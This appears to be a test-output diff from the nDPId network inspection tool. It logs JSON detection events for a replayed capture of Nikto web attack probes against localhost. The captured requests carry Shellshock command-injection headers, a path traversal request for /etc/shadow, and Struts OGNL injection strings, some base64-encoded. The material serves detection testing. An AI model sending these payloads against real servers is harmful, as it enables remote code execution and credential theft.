-00890{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":496,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":496,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277466,"flow_last_seen":1576420277466,"flow_idle_time":7440000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"ts_msec":1576420277466,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50554,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","11":"HTTP Suspicious User-Agent","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/viewcvs.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
+01160{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":496,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":496,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277466,"flow_last_seen":1576420277466,"flow_idle_time":7440000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"ts_msec":1576420277466,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50554,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/viewcvs.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":497,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":497,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277467,"flow_last_seen":1576420277467,"flow_idle_time":7440000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"ts_msec":1576420277467,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50556,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00757{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":497,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":497,"flow_packet_id":1,"flow_last_seen":1576420277467,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":278,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":278,"pkt_l4_len":244,"ts_msec":1576420277467,"pkt":"AAAAAAAAAAAAAAAACABFAAEITytAAEAG7MJ\/AAABfwAAAcV8H5BFlnf\/97sS7IAYAED+\/AAAAQEICp1m\/gOdZv4DR0VUIC93ZWxjb21lIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-00886{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":497,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":497,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277467,"flow_last_seen":1576420277467,"flow_idle_time":7440000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"ts_msec":1576420277467,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50556,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","11":"HTTP Suspicious User-Agent","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/welcome","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
+01156{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":497,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":497,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277467,"flow_last_seen":1576420277467,"flow_idle_time":7440000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"ts_msec":1576420277467,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50556,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/welcome","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":498,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":498,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277469,"flow_last_seen":1576420277469,"flow_idle_time":7440000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"ts_msec":1576420277469,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50558,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00760{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":498,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":498,"flow_packet_id":1,"flow_last_seen":1576420277469,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":280,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":280,"pkt_l4_len":246,"ts_msec":1576420277469,"pkt":"AAAAAAAAAAAAAAAACABFAAEK4AFAAEAGW+p\/AAABfwAAAcV+H5B29+cpQb7It4AYAED+\/gAAAQEICp1m\/gWdZv4FR0VUIC93aG9pcy5jZ2kgSFRUUC8xLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQoNCg=="}
-00888{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":498,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":498,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277469,"flow_last_seen":1576420277469,"flow_idle_time":7440000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"ts_msec":1576420277469,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50558,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","11":"HTTP Suspicious User-Agent","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/whois.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
+01158{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":498,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":498,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277469,"flow_last_seen":1576420277469,"flow_idle_time":7440000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"ts_msec":1576420277469,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50558,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/whois.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":499,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":499,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277471,"flow_last_seen":1576420277471,"flow_idle_time":7440000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":205,"midstream":1,"ts_msec":1576420277471,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50560,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00748{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":499,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":499,"flow_packet_id":1,"flow_last_seen":1576420277471,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":271,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":271,"pkt_l4_len":237,"ts_msec":1576420277471,"pkt":"AAAAAAAAAAAAAAAACABFAAEB0rpAAEAGaTp\/AAABfwAAAcWAH5AE8+pw+\/3ZB4AYAED+9QAAAQEICp1m\/gedZv4HR0VUIC8gSFRUUC8xLjENClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQoNCg=="}
-00879{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":499,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":499,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277471,"flow_last_seen":1576420277471,"flow_idle_time":7440000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":205,"midstream":1,"ts_msec":1576420277471,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50560,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","11":"HTTP Suspicious User-Agent","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
+01149{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":499,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":499,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277471,"flow_last_seen":1576420277471,"flow_idle_time":7440000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":205,"midstream":1,"ts_msec":1576420277471,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50560,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":500,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":500,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277473,"flow_last_seen":1576420277473,"flow_idle_time":7440000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"ts_msec":1576420277473,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50562,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00711{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":500,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":500,"flow_packet_id":1,"flow_last_seen":1576420277473,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":245,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":245,"pkt_l4_len":211,"ts_msec":1576420277473,"pkt":"AAAAAAAAAAAAAAAACABFAADnqaNAAEAGkmt\/AAABfwAAAcWCH5DlqJF6VmPeaYAYAED+2wAAAQEICp1m\/gmdZv4JR0VUIC8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi9ldGMvc2hhZG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpkaXNod2FzaGVyKQ0KDQo="}
-00913{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":500,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":500,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277473,"flow_last_seen":1576420277473,"flow_idle_time":7440000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"ts_msec":1576420277473,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50562,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/shadow","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:dishwasher)"}}
+01102{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":500,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":500,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277473,"flow_last_seen":1576420277473,"flow_idle_time":7440000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"ts_msec":1576420277473,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50562,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/shadow","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:dishwasher)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":501,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":501,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277474,"flow_last_seen":1576420277474,"flow_idle_time":7440000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":281,"flow_avg_l4_payload_len":281,"midstream":1,"ts_msec":1576420277474,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50564,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00848{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":501,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":501,"flow_packet_id":1,"flow_last_seen":1576420277474,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":347,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":347,"pkt_l4_len":313,"ts_msec":1576420277474,"pkt":"AAAAAAAAAAAAAAAACABFAAFN5cZAAEAGVeJ\/AAABfwAAAcWEH5A2eN0dBhBSM4AYAED\/QQAAAQEICp1m\/gqdZv4KR0VUIC8gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29udGVudC1UeXBlOiAleyNjb250ZXh0Wydjb20ub3BlbnN5bXBob255Lnh3b3JrMi5kaXNwYXRjaGVyLkh0dHBTZXJ2bGV0UmVzcG9uc2UnXS5hZGRIZWFkZXIoJ05pa3RvLUFkZGVkLUNWRS0yMDE3LTU2MzgnLDcqNil9Lm11bHRpcGFydC9mb3JtLWRhdGENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzdHJ1dHNob2NrKQ0KDQo="}
-00854{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":501,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":501,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277474,"flow_last_seen":1576420277474,"flow_idle_time":7440000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":281,"flow_avg_l4_payload_len":281,"midstream":1,"ts_msec":1576420277474,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50564,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:strutshock)"}}
+01043{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":501,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":501,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277474,"flow_last_seen":1576420277474,"flow_idle_time":7440000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":281,"flow_avg_l4_payload_len":281,"midstream":1,"ts_msec":1576420277474,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50564,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:strutshock)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":502,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":502,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277477,"flow_last_seen":1576420277477,"flow_idle_time":7440000,"flow_min_l4_payload_len":293,"flow_max_l4_payload_len":293,"flow_tot_l4_payload_len":293,"flow_avg_l4_payload_len":293,"midstream":1,"ts_msec":1576420277477,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50566,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00864{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":502,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":502,"flow_packet_id":1,"flow_last_seen":1576420277477,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":359,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":359,"pkt_l4_len":325,"ts_msec":1576420277477,"pkt":"AAAAAAAAAAAAAAAACABFAAFZtP1AAEAGhp9\/AAABfwAAAcWGH5CUg4wjlAViUYAYAED\/TQAAAQEICp1m\/g2dZv4NR0VUIC9pbmRleC5hY3Rpb24gSFRUUC8xLjENCkNvbnRlbnQtVHlwZTogJXsjY29udGV4dFsnY29tLm9wZW5zeW1waG9ueS54d29yazIuZGlzcGF0Y2hlci5IdHRwU2VydmxldFJlc3BvbnNlJ10uYWRkSGVhZGVyKCdOaWt0by1BZGRlZC1DVkUtMjAxNy01NjM4Jyw3KjYpfS5tdWx0aXBhcnQvZm9ybS1kYXRhDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c3RydXRzaG9jaykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":502,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":502,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277477,"flow_last_seen":1576420277477,"flow_idle_time":7440000,"flow_min_l4_payload_len":293,"flow_max_l4_payload_len":293,"flow_tot_l4_payload_len":293,"flow_avg_l4_payload_len":293,"midstream":1,"ts_msec":1576420277477,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50566,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.action","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:strutshock)"}}
+01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":502,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":502,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277477,"flow_last_seen":1576420277477,"flow_idle_time":7440000,"flow_min_l4_payload_len":293,"flow_max_l4_payload_len":293,"flow_tot_l4_payload_len":293,"flow_avg_l4_payload_len":293,"midstream":1,"ts_msec":1576420277477,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50566,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.action","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:strutshock)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":503,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":503,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277478,"flow_last_seen":1576420277478,"flow_idle_time":7440000,"flow_min_l4_payload_len":293,"flow_max_l4_payload_len":293,"flow_tot_l4_payload_len":293,"flow_avg_l4_payload_len":293,"midstream":1,"ts_msec":1576420277478,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50568,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00864{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":503,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":503,"flow_packet_id":1,"flow_last_seen":1576420277478,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":359,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":359,"pkt_l4_len":325,"ts_msec":1576420277478,"pkt":"AAAAAAAAAAAAAAAACABFAAFZjkpAAEAGrVJ\/AAABfwAAAcWIH5BLo7aS1iADwIAYAED\/TQAAAQEICp1m\/g6dZv4OR0VUIC9sb2dpbi5hY3Rpb24gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnN0cnV0c2hvY2spDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpDb250ZW50LVR5cGU6ICV7I2NvbnRleHRbJ2NvbS5vcGVuc3ltcGhvbnkueHdvcmsyLmRpc3BhdGNoZXIuSHR0cFNlcnZsZXRSZXNwb25zZSddLmFkZEhlYWRlcignTmlrdG8tQWRkZWQtQ1ZFLTIwMTctNTYzOCcsNyo2KX0ubXVsdGlwYXJ0L2Zvcm0tZGF0YQ0KDQo="}
-00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":503,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":503,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277478,"flow_last_seen":1576420277478,"flow_idle_time":7440000,"flow_min_l4_payload_len":293,"flow_max_l4_payload_len":293,"flow_tot_l4_payload_len":293,"flow_avg_l4_payload_len":293,"midstream":1,"ts_msec":1576420277478,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50568,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/login.action","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:strutshock)"}}
+01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":503,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":503,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277478,"flow_last_seen":1576420277478,"flow_idle_time":7440000,"flow_min_l4_payload_len":293,"flow_max_l4_payload_len":293,"flow_tot_l4_payload_len":293,"flow_avg_l4_payload_len":293,"midstream":1,"ts_msec":1576420277478,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50568,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/login.action","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:strutshock)"}}
